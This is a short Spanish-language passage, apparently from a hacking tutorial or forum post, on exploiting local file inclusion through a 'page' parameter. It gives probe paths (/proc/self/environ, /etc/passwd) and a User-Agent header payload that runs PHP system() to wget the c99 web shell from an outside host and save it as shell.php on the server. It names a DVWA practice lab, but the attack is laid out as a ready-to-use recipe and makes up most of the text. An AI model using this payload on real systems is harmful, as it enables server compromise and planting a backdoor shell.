Aquí podemos comprobar con "/fi/?page=/proc/self/environ" o con "/fi/?page=/etc/passwd", si es vulnerable (o bien con algun archivo de windows si está en ese sitema)
Siendo vulnerable a /proc/self/environ, se puede enviar en el User-agent de la petición lo siguiente:
User-Agent: <? system("wget -O shell.php http://www.c99txt.net/s/c99.txt");?>
Con el Live HTTP headers mismo se puede hacer, y ya tenemos una shell para indagar más.
Para sistemas Win, habrá que mirar que posibilidades hay siendo vulnerable, en hack.me hay un DVWA en sistema Win